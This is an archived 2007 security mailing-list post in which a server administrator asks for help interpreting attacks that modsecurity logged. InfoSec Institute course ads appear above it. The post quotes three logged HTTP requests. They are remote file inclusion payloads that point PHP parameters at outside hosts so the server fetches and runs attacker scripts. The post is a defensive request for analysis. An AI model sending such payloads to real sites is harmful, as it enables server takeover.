Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Security-Basics
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP web exploit/vulnerability

from [Camilo Olea] Network Security [Permanent Link]
Subject: PHP web exploit/vulnerability
Date: Tue, 23 Oct 2007 11:29:47 -0500 
Hello everyone,

I'm sorry if this is a stupid question, but I just wanted your input, maybe direct me to some links, another mail list, or whatever you might add would be highly appreciated; we have modsecurity installed on our server, and it has been logging many attacks like the following:

GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti \
ngen.de/admin/ec.txt? HTTP/1.1

GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)% \
20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1

GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1

I managed to get a copy of the php script which these attacks try to force the server to execute, I could post it here if that is correct and anybody could take a look at it and help me out a little to understand what it's trying to do.

Any help is appreciated, thanks in advance.

Camilo Olea



[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: IDS-IPS Recommendation, Kevin Ortloff
Next by Date:  Re: why most sql injection is not occurred at mysql?, Brian Daniel Beck
Previous by Thread:  RE: Event Log Monitor Program, Kevin Ortloff
Next by Thread:  RE: PHP web exploit/vulnerability, David Gutierrez
Indexes:  [Date] [Thread] [Top] [All Lists]